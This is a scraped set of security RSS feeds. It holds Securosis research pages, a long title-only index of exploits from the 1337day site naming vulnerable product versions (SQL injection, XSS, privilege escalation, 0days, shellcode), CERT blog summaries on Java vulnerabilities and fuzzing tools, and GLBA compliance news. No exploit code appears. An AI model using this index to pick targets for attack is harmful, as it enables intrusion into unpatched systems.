http://securosis.com/feeds/research Project Quant is a special research project to develop a metrics model for measuring the costs and effectiveness of patch management. This page includes the research deliverables associated with the project. All of the draft materials and public feedback are available on the project Blog and Forums: * The Project Quant Blog and Landing Page * The Project Quant Forums Published project documents include: * Version 1.0 of the Project Quant Report * The Project Quant Survey Results Analysis Here are the raw survey results from the project’s Open Patch Management Survey: * Project Quant Raw Survey Results, September 2009. (Zip file includes summary results in Excel format, and full raw results in Excel and CVS formats.) * The survey is still active, and you can participate here. Subscribe to our daily email digest

==> ADMP: Application and Database Monitoring and Protection

http://securosis.com/feeds/research Applications and Database Monitoring and Protection: ADMP. What is it? It’s a different way to think about security for applications. It’s a unified approach to securing applications by examining all of the components at once, viewing security as an operational issue, and getting tools to talk to each other. It means looking at application security in context of the business rules around transaction processing, and not just from a generic network traffic perspective. It is also a bit of prognostication, recommendation, and evangelism on our part, all rolled up into one unified theory. This approach also defocuses from some of the more traditional network and platform security models, and looks at the data and how applications process transactions and data. ADMP is essentially the data center branch of information-centric security, and it combines elements of data and application security into a consistent and specific architecture. The goal is to watch application transactions from the browser through the database, and apply security controls that actually ‘understand’ what’s going on. Our definition is: Products that monitor all activity in a business application and database, identify and audit users and content, and, based on central policies, protect data based on content, context, and/or activity. Papers and Posts ------------ 1. The lead-in to this series of thought is Rich’s posts on The Future Of Application and Database Security, Part 1 and Part 2. 2. Definitions: Content Monitoring and Protection And Application and Database Monitoring and Protection. 3. What is my motivation, or Why Are We Talking About ADMP. 4. ADMP and Assessment: Linking preventative and detective technologies. 5. ADMP: A Policy Driven Example. 6. Web Application Security: We Need Web Application Firewalls to Work. Better. 7. It’s Time To Move Past Vulnerability Scanning To Anti-Exploitation. Presentations --------- * Our presentation on Information Centric Data Security and the Data Centric Security Lifecycle. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Subscribe to our daily email digest

==> web - vShare<=2.8.1 SQL injection + Remote Command Execution

http://www.1337day.com/rss

==> dos / - Kaspersky Internet Security 2013 - Denial Of Service Vulnerability

http://www.1337day.com/rss

==> web - Nconf 1.3 SQL Injection / Cross Site Scripting Vulnerabilities

http://www.1337day.com/rss

==> local - Setuid Tunnelblick Privilege Escalation Vulnerability

http://www.1337day.com/rss

==> local - Viscosity setuid-set ViscosityHelper Privilege Escalation Vulnerability

http://www.1337day.com/rss

==> web - phpMyRecipes 1.2.2 XSS / SQL Injection Vulnerabilities

http://www.1337day.com/rss

==> web - Demandware Store XSS Vulnerability

http://www.1337day.com/rss

==> web - PloggerGallery 1.0 RC1 CSRF / XSS / SQL Injection Vulnerabilities

http://www.1337day.com/rss

==> web - D-Link DSL-2740B Authentication Bypass Vulnerability

http://www.1337day.com/rss

==> web - Question2Answer 1.5.3 CSRF / Brute Force Vulnerability

http://www.1337day.com/rss

==> dos / - Hanso Player 2.1.0 (.m3u) - Buffer Overflow Vulnerability

http://www.1337day.com/rss

==> web - Doorgets CSRF Vulnerability

http://www.1337day.com/rss

==> web - Piwigo 2.4.6 - Multiple Vulnerabilities

http://www.1337day.com/rss

==> remote - Sami FTP Server 2.0.1 LIST Command Buffer Overflow

http://www.1337day.com/rss

==> web - PHP-Fusion 7.02.05 XSS / LFI / SQL Injection Vulnerabilities

http://www.1337day.com/rss

==> web - D-Link DIR-645 Authentication Bypass Vulnerability

http://www.1337day.com/rss

==> web - Piwigo 2.4.6 Cross Site Request Forgery / Traversal Vulnerabilities

http://www.1337day.com/rss

==> web - Geeklog 1.8.2 Cross Site Scripting Vulnerability

http://www.1337day.com/rss

==> web - Scripts Genie Top Sites v2.11 <= Remote XSS Vulnerability

http://www.1337day.com/rss

==> web - Gallery Personals Script Remote XSS Vulnerability

http://www.1337day.com/rss

==> web - Scripts Genie Domain Trader Remote XSS Vulnerability

http://www.1337day.com/rss

==> web - Digitale Age scripte Remote XSS/FPD Vulnerabilities

http://www.1337day.com/rss

==> web - Hitechvalley iNet CMS advanced SQL Injection vulnerability

http://www.1337day.com/rss

==> remote - Fileutils Ruby Gem Remote Command Execution Vulnerability

http://www.1337day.com/rss

==> web - 360wichita XSS/SQL Injection Vulnerabilities

http://www.1337day.com/rss

==> web - KeenLook XSS/SQL Injection Vulnerabilities

http://www.1337day.com/rss

==> web - Epop Studio XSS/SQL Injection Vulnerabilities

http://www.1337day.com/rss

==> web - Blog System 2.0 XSS/SQL Injection Vulnerability

http://www.1337day.com/rss

==> local - Archlinux x86-64 3.3.x-3.7.x x86-64 sock_diag_handlers[] Local Root

http://www.1337day.com/rss

==> local - uTorrent 3.x app exploit 0day

http://www.1337day.com/rss

==> web - Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability

http://www.1337day.com/rss

==> web - Wordpress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - Brewthology 0.1 SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - MTP Image Gallery 1.0 XSS Vulnerability

http://www.1337day.com/rss

==> web - MTP Guestbook 1.0 - Multiple XSS Vulnerabilities

http://www.1337day.com/rss

==> web - MTP Poll 1.0 - Multiple XSS Vulnerabilities

http://www.1337day.com/rss

==> web - Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability

http://www.1337day.com/rss

==> web - Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability

http://www.1337day.com/rss

==> web - PolarPearCms PHP File Upload Vulnerability

http://www.1337day.com/rss

==> web - MindStorm CMS SQL Injection vulnerability

http://www.1337day.com/rss

==> web - WEBalbum 2.0 SQL Injection Vulnerability

http://www.1337day.com/rss

==> dos / - Joomla <=2.5.8,<=3.0.2 remote tcp connections opener

http://www.1337day.com/rss

==> web - Google Alert And Twitter WP Plugin v. 3.1.5 XSS Exploit & SQL Injection

http://www.1337day.com/rss

==> remote - Java Applet JMX Remote Code Execution

http://www.1337day.com/rss

==> web - Flatstick CMS PHP Hash Collision Denial Of Service Vulnerability

http://www.1337day.com/rss

==> local - TeamViwer V8.0.16642 Insecure Library Load

http://www.1337day.com/rss

==> web - Rix4Web Portal Remote Blind SQL Injection Vulnerability

http://www.1337day.com/rss

==> local - Photodex ProShow Producer 5.0.3297 Insecure Library Load

http://www.1337day.com/rss

==> web - TECNOMEGA SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - EasyWebScripts eBay Clone Script SQL Injection / XSS Vulnerabilities

http://www.1337day.com/rss

==> web - ArrowChat 1.5.61 RFI Vulnerability

http://www.1337day.com/rss

==> web - EAFlash Uploader Remote File Upload vulnerability

http://www.1337day.com/rss

==> web - Web Cookbook File Disclosure / SQL Injection Vulnerabilities

http://www.1337day.com/rss

==> web - OpenEMR 4.1.1 Cross Site Scripting Vulnerability

http://www.1337day.com/rss

==> web - Alt-N MDaemon 13.0.3 and 12.5.6 Email Body HTML/JS Injection Vulnerability

http://www.1337day.com/rss

==> web - Alt-N MDaemon WorldClient 13.0.3 - Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - glFusion 1.2.2 - Multiple XSS Vulnerabilities

http://www.1337day.com/rss

==> web - phpMyRecipes 1.2.2 - SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - phpMyRecipes 1.2.2 SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - RTTucson Quotations Database Authentication Bypass Vulnerability

http://www.1337day.com/rss

==> web - glFusion 1.2.2 Cross Site Scripting Vulnerability

http://www.1337day.com/rss

==> web - e107 Persistant XSS vulnerability

http://www.1337day.com/rss

==> remote - BigAnt Server 2 SCH And DUPF Buffer Overflow Vulnerability

http://www.1337day.com/rss

==> remote - BigAnt Server DUPF Command Arbitrary File Upload Vulnerability

http://www.1337day.com/rss

==> web - Foswiki MAKETEXT 1.1.7 / 1.0.10 Code Execution Vulnerability

http://www.1337day.com/rss

==> web - OpenEMR PHP File Upload Vulnerability

http://www.1337day.com/rss

==> web - Squirrelcart 3.5.4 Cross Site Scripting Vulnerability

http://www.1337day.com/rss

==> web - CKEditor 4.0.1 CSRF / XSS / Path Disclosure Vulnerabilities

http://www.1337day.com/rss

==> web - vBulletin 5.0.0 Beta Release 0day Exploit

http://www.1337day.com/rss

==> [shellcode] - Linux/x86 Remote Port forwarding 87 bytes

http://www.1337day.com/rss

==> [shellcode] - Linux/x86 Force Reboot shellcode 36 bytes

http://www.1337day.com/rss

==> web - spidaVote 1.3 (id) SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - RTTucson Quotations Database Script Sql injection Vulnerability

http://www.1337day.com/rss

==> web - Piwigo 2.4.6 Arbitrary File Read / Delete Vulnerabilities

http://www.1337day.com/rss

==> web - PHP-Fusion CMS 7.02.05 SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - ZeroClipboard XSS vulnerabilities

http://www.1337day.com/rss

==> web - Smoke Loader LFI / File Deletion Vulnerabilities

http://www.1337day.com/rss

==> web - Netgear DGN2200B - Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - Cometchat Application - Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - Scripts Genie Pet Rate Pro SQL injection Vulnerability

http://www.1337day.com/rss

==> web - Scripts Genie Hot Scripts Clone SQL Injection Vulnerability

http://www.1337day.com/rss

==> dos / - VLC 2.0.5 (.bmp) Heap Overflow PoC

http://www.1337day.com/rss

==> web - Scripts Genie Gallery Personals SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - Scripts Genie Domain Trader SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - Scripts Genie Games Site Script SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - Scripts Genie Top Sites SQL Injection Vulnerability

http://www.1337day.com/rss

==> local - Apple iPhone iOS Default SSH Password Exploit (.py)

http://www.1337day.com/rss

==> web - ARASTAR Sql Injection Vulnerability

http://www.1337day.com/rss

==> web - Ajax File Manager Remote Code Execution Exploit

http://www.1337day.com/rss

==> web - A4tech Bloody2 Mouse Activation

http://www.1337day.com/rss

==> web - Dimofinf cms version 3.0.0 Sql Injection Vulnerability

http://www.1337day.com/rss

==> remote - SAP Netweaver Message Server Buffer Overflow Vulnerability

http://www.1337day.com/rss

==> web - Sonar 3.4.1 Cross Site Scripting Vulnerability

http://www.1337day.com/rss

==> remote - xMatters Alarmpoint BoF-0day

http://www.1337day.com/rss

==> remote - EChat Server 3.1 BoF-0day

http://www.1337day.com/rss

==> web - WiFilet v1.2 iPad iPhone - Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - PHP-Nuke module (League 2.4) XSS Vulnerability

http://www.1337day.com/rss

==> web - PHP-Nuke Module Nukequiz <= 2.0.0 SQL Injection Vulnerability

http://www.1337day.com/rss

==> Anatomy of Java Exploits

http://www.cert.org/blogs/vuls/rss.xml On behalf of the real author, my colleague David Svoboda (and a couple others who work on the CERT Secure Coding Initiative), here's a post analyzing recent Java exploits. Java was exploited recently and last August. The August exploit was patched by Oracle on August 30; this most recent exploit now also has a patch available. Strictly speaking, the vulnerabilities that permitted both exploits are independent; the current exploit attacked code that was unused by the August exploit. Nevertheless, these vulnerabilities were quite similar. This blog post examines the vulnerabilities that permitted Java to be exploited in each case, using the proof-of-concept code exploits that have been published for them in January 2013 and August 2012.

==> Java in Web Browser: Disable Now!

http://www.cert.org/blogs/vuls/rss.xml Hi, it's Will and Art here. We've been telling people to disable Java for years. In fact, the first version of the Securing Your Web Browser document from 2006 provided clear recommendations for disabling Java in web browsers. However, after investigating the Java 7 vulnerability from August, I realized that completely disabling Java in web browsers is not as simple as it should be. Luckily, Oracle has since added a new option in the Java control panel applet to disable Java in the browser. If you haven't already done so, now is the time to disable Java in the browser.

==> Forking and Joining Python Coroutines to Collect Coverage Data

http://www.cert.org/blogs/vuls/rss.xml In this post I'll explain how to expand on David Beazley's cobroadcast pattern by adding a join capability that can bring multiple forked coroutine paths back together. I'll apply this technique to create a modular Python script that uses gcov, readelf, and other common unix command line utilities to gather code coverage information for an application that is being tested. Along the way I'll use ImageMagick under Ubuntu 12.04 as a running example.

==> A Look Inside CERT Fuzzing Tools

http://www.cert.org/blogs/vuls/rss.xml Hi, this is Allen Householder of the CERT Vulnerability Analysis team. If you've been following this blog for a while, you are probably familiar with our fuzzing tools: Dranzer, the CERT Basic Fuzzing Framework (BFF), and the CERT Failure Observation Engine (FOE). While creating tools that can find and analyze vulnerabilities makes up a significant portion of our work in the CERT Vulnerability Analysis team, our focus is on developing and communicating the knowledge we've built into those systems. To that end, we recently published a pair of reports that describe a few of the heuristics and algorithms implemented in the BFF and FOE fuzzing tools. We briefly mentioned these techniques in the release announcements for the tools, but did not describe how they work in detail. Abstracts and links to the reports can be found below.

==> Updates to CERT Fuzzing Tools (BFF 2.6 & FOE 2.0.1)

http://www.cert.org/blogs/vuls/rss.xml Hi everybody. Allen Householder from the CERT Vulnerability Analysis team here, back with another installment of "What's new in CERT's fuzzing frameworks?" Today we're announcing the release of updates of both our fuzzing tools, the CERT Basic Fuzzing Framework (BFF) version 2.6 and the CERT Failure Observation Engine (FOE) version 2.0.1. The remainder of this post describes the changes in more detail.

==> Java 7 Attack Vectors, Oh My!

http://www.cert.org/blogs/vuls/rss.xml While researching how to successfully mitigate the recent Java 7 vulnerability (VU#636312, CVE-2012-4681), we (and by "we" I mean "Will Dormann") found quite a mess. In the midst of discussion about exploit activity and the out-of-cycle update from Oracle, I'd like to call attention to a couple other important points.

==> The Report "Network Profiling Using Flow" Released

http://www.cert.org/blogs/vuls/rss.xml Hi, this is Austin Whisnant of the CERT Network Situational Awareness Team (NetSA). After a long time in the making, NetSA has published an SEI technical report on how to inventory assets on a network using network flow data. Knowing what assets are on your network, especially those visible to outsiders, is an important step in gaining network situational awareness.

==> Java Security Manager Bypass Vulnerability

http://www.cert.org/blogs/vuls/rss.xml Last Sunday, another major Java vulnerability (VU#636312) was reported. Until an official update is available, we strongly recommend disabling the Java 7 plug-in for web browsers.

==> CERT Failure Observation Engine 2.0 Released

http://www.cert.org/blogs/vuls/rss.xml Hi folks, Allen Householder from the CERT Vulnerability Analysis team here. Back in April, we released version 1.0 of the CERT Failure Observation Engine (FOE), our fuzzing framework for Windows. Today we're announcing the release of FOE version 2.0. (Here's the download.) Although it has only been a few months since we announced FOE 1.0, our development cycle is such that FOE 2.0 actually reflects nearly a year of additional improvements over the 1.0 release. Our main focus in developing FOE 2.0 was to apply what we learned from creating the CERT Basic Fuzzing Framework version 2.5 for Linux and OS X to improve our fuzzing capabilities on Windows. We are gradually converging our code bases for BFF and FOE to simplify maintenance and the incorporation of new features. We're not quite there yet, but FOE 2.0 reflects a significant step in that direction. Read on for more details.

==> Vulnerability Data Archive

http://www.cert.org/blogs/vuls/rss.xml With the hope that someone finds the data useful, we're publishing an archive of almost all of the non-sensitive vulnerability information in our vulnerability reports database.

==> CERT Basic Fuzzing Framework 2.5 Released

http://www.cert.org/blogs/vuls/rss.xml Hi folks, Allen Householder here. In addition to the recent introduction of our new Failure Observation Engine (FOE) fuzzing framework for Windows and Linux Triage Tools, we have updated the CERT Basic Fuzzing Framework (BFF) to version 2.5. This post highlights the significant changes.

==> CERT Linux Triage Tools 1.0 Released

http://www.cert.org/blogs/vuls/rss.xml As part of the vulnerability discovery work at CERT, we have developed a GNU Debugger (GDB) extension called "exploitable" that classifies Linux application bugs by severity. Version 1.0 of the extension is available for public download here. This blog post contains an overview of the extension and how it works.

==> Vulnerability Severity Using CVSS

http://www.cert.org/blogs/vuls/rss.xml If you analyze, manage, publish, or otherwise work with software vulnerabilities, hopefully you've come across the Common Vulnerability Scoring System (CVSS). I'm happy to announce that US-CERT Vulnerability Notes now provide CVSS metrics.

==> Detecting Abnormal Technology Systems Behavior

http://www.compliancehome.com/rss/resources-GLBA.xml With hundreds and thousands of automated systems producing log data, an organization's ability to respond to

==> Upgraded Version of WebSearch Launched by DocuLex

http://www.compliancehome.com/rss/resources-GLBA.xml WebSearch version 4.2 that boasts of additional features like customized business process and collaborative workflow capability has been introduced by DocuLex, Content management software provider. WebSearch version 4.2 is a product of DocuLex Archive Studio that helps organizations with decision making power via automation of any business process through the benefit of systematic workflow.

==> Model Consumer Privacy Notice Online Form Builder Released by Federal Regulators

http://www.compliancehome.com/rss/resources-GLBA.xml An Online Form Builder that financial institutions can download and use to develop and print customized versions of a model consumer privacy notice is released by eight federal regulators, including the Federal Reserve Board and the Federal Trade Commission. The form builder, based on the model form regulation published in the Federal Register on Dec. 1, 2009, under the Gramm-Leach-Bliley Act (GLBA), is available with several options. The form builder will guide an institution to select the version of the model form that fits its practices, such as whether the institution provides an opt-out for consumers.

==> ACA-Supported Gramm-Leach-Bliley Reforms Passed by U.S. House

http://www.compliancehome.com/rss/resources-GLBA.xml The U.S. House of Representatives passed H.R. 3506 by voice vote on the Suspension Calendar, creating a positive policy step forward for our industry on on April 14, 2010. H.R. 3506, which was sponsored by Representatives Erik Paulsen (R-MN) and Dennis Moore (D-KS), removes burdensome requirements under the Gramm-Leach-Bliley Act (GLBA).

==> An Advisers msut know the ways to protect clients' privacy

http://www.compliancehome.com/rss/resources-GLBA.xml As more and more personal financial information is transmitted online and stored electronically, concerns about privacy and data protection have grown. For financial advisers, privacy issues will only become more important as technology and new types of media proliferate.

==> Reasons Why the U.S. Wont Be Prepared For Cyberwar by Rockefeller-Snowe's Regulations

http://www.compliancehome.com/rss/resources-GLBA.xml Sens. Jay Rockefeller (D-W. Va.) and Olympia Snowe (R-Maine) have formulated a new cybersecurity bill that they described in Fridays Wall Street Journal. (Use Google news to get to the full article.) The bill as proposed will be very disruptive to the operations of every business and will do essentially nothing to prepare the U.S. for cyberwar.

==> GLBA Privacy Notices At Last Get Overhauled

http://www.compliancehome.com/rss/resources-GLBA.xml On November 17, 2009, the Federal Trade Commission (FTC), along with other federal regulators (Federal Deposit Insurance Corporation, Federal Reserve Board, Office of the Comptroller of the Currency, Office of Thrift Supervision, National Credit Union Administration, Commodity Futures Trading Commission, and Securities and Exchange Commission, collectively referred to as Agencies) adopted final Model Privacy Notice forms for compliance with the Gramm-Leach Bliley Act (GLBA) and its implementing regulation, the FTCs Financial Privacy Rule. The Model Privacy Notice replaces the Sample Clauses, which appear in Appendix B to the Privacy Rule and, as such, now provide the safe harbor for compliance.

==> Cloud Computing Backup? Significant Questions

http://www.compliancehome.com/rss/resources-GLBA.xml The quick evolution and maturity of cloud storage providers creates a new opportunity for managed service providers to offer cloud backup services. Backup to the cloud can provide a compelling cost advantage for SMB and SME customers and it opens up a new model for VARs and MSPs to profit with cloud-based backup services.

==> Effective Workflow for Fixing Network Vulnerabilities & Policy Compliance

http://www.compliancehome.com/rss/resources-GLBA.xml This webcast Abstracts the 8 workflow processes that create an effective vulnerability management solution to ensure security and document compliance. Discover how the right software-as-a-service (SaaS) solution automates these processes for fast, cost-effective remediation and policy compliance. View this webcast and learn about and effective remediation plan that provides continuous protection from network vulnerabilities and helps comply with regulations such as PCI, GLBA and HIPAA

==> New Degausser Introduced by SEM

http://www.compliancehome.com/rss/resources-GLBA.xml The Model EMP001 Eliminator Hard Drive and Magnetic Tape Degausser is being introduced by Security Engineered Machinery, its most recent product for degaussing hard drives. The electromagnetic-pulse degausser permanently erases data from computer hard drives, data tapes, and other magnetic media. The EMP001 is on the U.S. National Security Agency's Evaluated Products List, complies with Department of Defense requirements for destroying classified information on magnetic media, and exceeds the requirements of many national and international legislative mandates (FACTA, HIPAA, GLB, DPA, etc.) for the destruction of confidential/sensitive data.

==> Is Compliance in the Cloud Achievable

http://www.compliancehome.com/rss/resources-GLBA.xml There is no doubt that cloud computing is dominating today's IT conversation among C-level security executives. Whether it's due to the compelling cost saving possibilities in a tough economy, or because of perceived advantages in provisioning flexibility, auto-scaling, and on-demand computing, CSOs are probing the capabilities, costs and restrictions of the cloud. At the same time, security and compliance concerns are at the forefront of issues potentially holding large enterprises back from capitalizing on the benefits that cloud computing has to offer.

==> Harmonizing Controls to Reduce Your Cost of Compliance

http://www.compliancehome.com/rss/resources-GLBA.xml Mounting regulations across the globe have increased the cost and burden on organizations. The high cost is especially felt by organizations which must adhere to multiple requirements - 75 percent of organizations must comply with two or more regulations and corresponding audits and more than 40 percent must comply with three or more regulations.

==> Detecting Abnormal Technology Systems Behavior

http://www.compliancehome.com/rss/resources-GLBA.xml With hundreds and thousands of automated systems producing log data, an organization's ability to respond to

==> Federal and State Data Regulations Not to be Overlooked

http://www.compliancehome.com/rss/resources-GLBA.xml Tracking new regulations and compliance rulings from federal and state government can be dizzyingthey include FRCP, HIPAA, GLB, and more. But now more than ever, the government expects all businesses to comply, not just large corporations. Today, every company is responsible for its data and for securing its customers information, no matter how much it costs to do so. In todays litigious business world, the possibility of being dragged into a lawsuit is very real, and if that happens, you will likely need to make your information available to the process. And woe to the company that cannot comply with basic regulations, because a judge will not accept that you thought those requirements applied only to the big companies.

==> Trailing Ground: Gramm-Leach-Bliley and the Future of Banking

http://www.compliancehome.com/rss/resources-GLBA.xml The debate in Washington over financial regulation has probably puzzled most of the observers by references to the GLBA as a cause of the financial crisis. At the time of its adoption, the GLBA was hailed as a forward-looking effort to bring new flexibility and change to the banking industry. As described by John LaFalce, then the ranking Democrat on the House Financial Services Committee,

==> Payment System Product Codes to be Evaluated by PCATS

http://www.compliancehome.com/rss/resources-GLBA.xml A survey to identify the use of PCATS payment product codes within the convenience store industry has been created by the Petroleum Convenience Alliance for Technology Standards (PCATS). In addition to measuring the number of merchant fueling locations that have implemented PCATS standard payment product codes at their point of sale (POS), the survey may also help identify additional items that need to be added to the current industry code list.

==> IBM's Acquisition Of Guardium Created a Buzz in Security market

http://www.compliancehome.com/rss/resources-GLBA.xml IBM's acquisition of database activity monitoring (DAM) vendor Guardium has created a lot of buzz in the security industry. This is the first major acquisition in the database security market, the first time a large company has bet on DAM technology, and if the rumored sales price is accurate, then it suggests IBM paid a premium. And given the value this product can provide to IBM customers, it looks like a good investment.

==> A Combined Security Solution for Governance Portal

http://www.compliancehome.com/rss/resources-GLBA.xml A worldwide business consulting and internal audit firm, Protiviti Inc., has introduced the first product in its new Governance Portal for Information Technology series. The product is a security solution directed at mitigating data security risks and avoiding costly data breaches and reputation damage.

==> Analyst Webinar on Risk and Compliance Management: Learning from Leaders and Steps You Can Take

http://www.compliancehome.com/rss/resources-GLBA.xml Join Forrester Research Analyst, Chris McClean, for learning what leading companies are doing for effective risk and compliance management and step you can take today. While Risk managers in all industries are grappling with the problems of performing real-time risk measurement and mitigation, an additional complexity due stringent compliance and regulatory requirements, like SOX, FCPA, HIPAA, AML, GLBA, FERC, NERC and many more, add an additional layer of challenges for them. As a result, companies are looking to systematically identify, measure, prioritize and respond to all types of risk in the business, while ensuring compliance to federal and state regulations.

==> PCI - It's Not Quite Everywhere It Should Be

http://www.compliancehome.com/rss/resources-GLBA.xml Join to learn about critical technologies that can assist your PCI compliance efforts. We will discuss how to: Protect critical data from leaving your enterprise through malicious hackers and/or employee mistakes Go beyond intrusion detection and prevention to a positive, proactive, security model that protects against new email and web-borne attacks, Safely enable remote employees, partners, contractors and other third parties to authenticate and access pertinent information, Implement security measures that ensure simultaneous compliance with PCI, SOX, GLBA, HIPAA and other privacy and data protection regulations.

==> Satellite Technology Used by Glacier Bay National Park Rangers to Help Tousled Whales

http://www.compliancehome.com/rss/resources-GLBA.xml Rangers in Glacier Bay National Park respond not only to human visitors in trouble, but also to marine life that need help. A recent case of a humpback whale that became entangled in a polyester line demonstrates not only the quick response of park rangers, but also how satellite technology can play a role in saving whales.

==> 'Managing the Cloud: Are You Comfortable with Where Your Data Sleeps at Night?'

http://www.compliancehome.com/rss/resources-GLBA.xml Why is cloud computing relevant today from an economic, business and technology standpoint? What are some potential benefits and pitfalls of moving to the cloud? What should you look for in a cloud computing provider to ensure the security of your data and applications? In an October 8 interview from Times Square, Sam Gross, vice president, Global Information Technology Outsourcing Solutions, Unisys Corporation, will answer these questions and more. Sam will talk about how the economy is accelerating a tectonic shift in IT and how it supports the business. bleep also discuss how to transform a traditional data center that is inflexible less flexible and costly to a cloud computing environment that is secure, virtualized and automated requiring less investment.

==> Sipera Secure Live Communications Mobility System Made Available by era Systems

http://www.compliancehome.com/rss/resources-GLBA.xml Smartphone VoIP and unified communications, or UC, business ready are offered by Sipera SLiC. This latest offering delivers enterprise-class communications privacy and security for VoIP and UC on smartphones. Additionally, the companys system enables smartphone VoIP to include smart-card card authentication for accessing enterprise resources. Company officials said that this provides unparalleled access control and communications privacy.

==> The Wonderful Triangle of IT Security

http://www.compliancehome.com/rss/resources-GLBA.xml The myths of the CIA triad Have you ever considered taking a role as the most senior person for information security working at a large corporation? Then you must be prepared to understand the key principles of information security-and how they really apply to life and business.

==> Sensitive Data to be Sealed by Solid Wireless Security Policies (Part 3)

http://www.compliancehome.com/rss/resources-GLBA.xml With smartphones gaining traction in the consumer world, its easy to forget that handsets are simply mini computers that could contain sensitive data about business contacts and inter-office electronic communication. In addition to putting in place a procurement policy that includes checks and balances for who gets what type of wireless device and plan, as well as a usage policy to make sure employees arent overusing mobile services for personal use, implementing a solid security policy is also essential, said Pankaj PJ Gupta, founder and CEO of Amtel (News - Alert), a company that helps enterprises to rein in wireless management expenses and improve productivity.

==> Updated AMU Kit Offered to FaceTime's Unified Security Gateway 3.0

http://www.compliancehome.com/rss/resources-GLBA.xml A purveyor of applications designed to promote the secure use of Web 2.0 and unified communications in the commercial segment, FaceTime Communication, announced the commercial launch of its Augment, Migrate and Update, or AMU kit. The kit is devised for enterprises who are at the brink of expensive upgrades needed to maintain compliance with enterprise security and control standards, which are essential to manage the changing face of the Internet.

==> Former Chairman of the Federal Reserve Wants to Bring Back 1933 Glass-Steagall Act

http://www.compliancehome.com/rss/resources-GLBA.xml The former Chairman of the Federal Reserve [1979-1987], that Paul Volker, has advised the Obama Administration to bring back the 1933 Glass-Steagall Act [SGA]. The Glass-Steagall Act was repealed in 1999 and replaced with the Gramm-Leach-Bliley Act [GLBA]. The GLBA removed restrictions on commercial banks and investment banks allowing them gross latitude in activities and services. (Reem Heakel, 2009)

==> SOX, GLBA and HIPAA: Multiple Regulations, One Compliance Solution - Vendor Webcast

http://www.compliancehome.com/rss/resources-GLBA.xml SOX, GLBA and HIPAA share a common regulatory compliance thread - the need to use automation to ensure continuous compliance with required IT controls. View this webcast for an overview of each regulation. Also, gain an understanding of the capabilities an organization must have in place to address these requirements.

==> Data Security should be ensured by the Strategy

http://www.compliancehome.com/rss/resources-GLBA.xml Over the past few years, with the rise in incidents of identity theft many organizations are rightfully concerned about keeping their customers' data private. While the financial service industry has been regulated since the late '90s by the federal government, other companies would be wise to follow their lead. For some years now, financial service companies have had to comply with the provisions of the oft-maligned Gramm Leach Bliley Act. Among other things, GLBA calls for a process that begins with an assessment of an organization's information systems, development of a security strategy, implementation of the strategy and, finally, ongoing monitoring.

==> FDA's Growing Role Regulating Health 2.0, Health IT

http://www.compliancehome.com/rss/resources-GLBA.xml The federal regulation is part of the deal is very well known by many who are involved in the world of health IT. Issues of health information privacy have been subject to an array of federal and state laws for decades. HIPAA, the Federal Privacy Act, laws governing Medicaid, Medicare, the Veterans Health Administration, funds used for the treatment of mental illness, sexually transmitted infections and on and on all have privacy provisions. There is a similar regulatory scheme for data security, again including HIPAA, the Gramm-Leach-Bliley Act and other laws.

==> SOX, GLBA and HIPAA: Multiple Regulations, One Compliance Solution

http://www.compliancehome.com/rss/resources-GLBA.xml SOX, GLBA and HIPAA share a common regulatory compliance thread - the need to use automation to ensure continuous compliance with required IT controls. These regulations require technical safeguards to protect or guarantee the veracity of critical information. With SOX, its for public companies to guarantee accurate financial accounting. GLBA protects personal financial information of an organizations customers. And HIPAA protects and guarantees the privacy of an individuals personal health information (PHI). What all three have in common is the requirement for specific IT controls. Learn more about these regulations and how to automate manual processes with an integrated change auditing and configuration control solution.

==> Severance of Duties in Virtualized Environments

http://www.compliancehome.com/rss/resources-GLBA.xml With Virtualization we have moved a step closer to the world of Star Trek. Think back to episodes of The Next Generation where Geordi was able to control the functions of the entire ship through a single touch-screen interface. He was able to reconfigure electrical, mechanical and propulsion systems without needing anyone else or additional authorization. The only thing to prevent him from doing something risky or damaging was the computer system itself.

==> SOX, GLBA and HIPAA: Multiple Regulations, One Compliance Solution

http://www.compliancehome.com/rss/resources-GLBA.xml SOX, GLBA and HIPAA share a common regulatory compliance thread - the need to use automation to ensure continuous compliance with required IT controls. These regulations require technical safeguards to protect or guarantee the veracity of critical information. With SOX, its for public companies to guarantee accurate financial accounting. GLBA protects personal financial information of an organizations customers. And HIPAA protects and guarantees the privacy of an individuals personal health information (PHI). What all three have in common is the requirement for specific IT controls. Learn more about these regulations and how to automate manual processes with an integrated change auditing and configuration control solution.

==> Availability of OfficeScreen Complete Announced by ANXeBusiness Corp.

http://www.compliancehome.com/rss/resources-GLBA.xml A leading provider of networking and security managed services, ANXeBusiness Corp., announced the availability of OfficeScreen Complete, a fully managed security solution providing comprehensive protection from web-based threats, advanced remote access capabilities, and productivity enhancement tools. Built upon two powerful security technologies - ANX OfficeScreen and ANX PositivePro - OfficeScreen Complete combines an award-winning managed firewall, site-to-site VPN, URL filtering, and remote access technology into one hosted solution. Additionally, when supporting five or more users, OfficeScreen Complete can also include wireless access point security, traffic shaping, and Internet failover support.

==> Bank compliance laws need to be streamlined to really help consumers

http://www.compliancehome.com/rss/resources-GLBA.xml In todays scenario is gets must for the banks to devote an huge amount of time and resources, at great expense, to keeping up with the never-ending cascade of new laws and regulations and keeping in compliance with the myriad existing ones. Before Congress enacts legislation implementing the part of the administration's regulatory reform proposal that calls for the establishment of a new Consumer Financial Protection Agency, it should take a close look at the compliance burdens already heaped upon banks.

==> Vital Information Security and Compliance Activities for 2010

